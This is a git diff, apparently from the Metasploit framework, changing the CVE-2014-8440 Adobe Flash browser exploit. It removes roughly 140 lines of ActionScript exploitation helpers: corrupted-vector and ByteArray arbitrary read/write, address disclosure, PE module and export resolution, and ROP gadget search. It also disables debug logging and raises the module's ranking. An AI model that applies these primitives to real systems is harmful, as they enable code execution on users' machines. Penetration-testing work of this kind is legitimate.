diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf index a677624095..5062779ed8 100755 Binary files a/data/exploits/CVE-2014-8440/msf.swf and b/data/exploits/CVE-2014-8440/msf.swf differ diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as index da8d636a59..c6e0928bd9 100755 --- a/external/source/exploits/CVE-2014-8440/Exploit.as +++ b/external/source/exploits/CVE-2014-8440/Exploit.as @@ -277,144 +277,5 @@ package } return 0xffffffff } - - // Use the corrupted shared_ba to disclose its own address - private function search_ba_address():uint { - var address:uint = 0 - this.shared_ba.position = 0x14 - address = shared_ba.readUnsignedInt() - if (address == 0) { - address = 0xffffffff - this.shared_ba.position = 8 - var next:uint = shared_ba.readUnsignedInt() - var prior:uint = shared_ba.readUnsignedInt() - if (next - prior == 0x8000) { - address = prior + 0x4000 - } - } else { - address = address - 0x30 - } - - return address - } - - // Use the corrupted uint vector to search an vector with - // interesting objects for info leaking - private function search_object_vector():uint { - var i:uint = 0; - while (i < 0x4000){ - if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) { - return i + 1; - } - i++ - } - return 0xffffffff - } - - // Methods to use the corrupted uint vector - - private function vector_write(addr:uint, value:uint = 0):void - { - var pos:uint = 0 - - if (addr > this.uv[0]) { - pos = ((addr - this.uv[0]) / 4) - 2 - } else { - pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1 - } - - this.uv[pos] = value - } - - private function vector_read(addr:uint):uint - { - var pos:uint = 0 - - if (addr > this.uv[0]) { - pos = ((addr - this.uv[0]) / 4) - 2 - } else { - pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1 - } - - return this.uv[pos] - } - - // Methods to use the corrupted byte array for arbitrary reading/writing - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) ba.position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) - if (zero) ba.writeByte(0) - } else ba.writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - ba.position = addr - switch(type) { - case "dword": - return ba.readUnsignedInt() - case "word": - return ba.readUnsignedShort() - case "byte": - return ba.readUnsignedByte() - } - return 0 - } - - // Methods to search the memory with the corrupted byte array - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) - var i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - ba.position = addr + entry - var dll_name:String = ba.readUTFBytes(name.length).toUpperCase(); - if (dll_name == name.toUpperCase()) { - break; - } - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))); - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - ba.position = addr + entry - if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } } } diff --git a/external/source/exploits/CVE-2014-8440/Logger.as b/external/source/exploits/CVE-2014-8440/Logger.as index 61ec768c25..16c0447973 100755 --- a/external/source/exploits/CVE-2014-8440/Logger.as +++ b/external/source/exploits/CVE-2014-8440/Logger.as @@ -3,7 +3,7 @@ package import flash.external.ExternalInterface public class Logger { - private static const DEBUG:uint = 1 + private static const DEBUG:uint = 0 public static function alert(msg:String):void { diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index 1847fc43ab..b4fa07267a 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer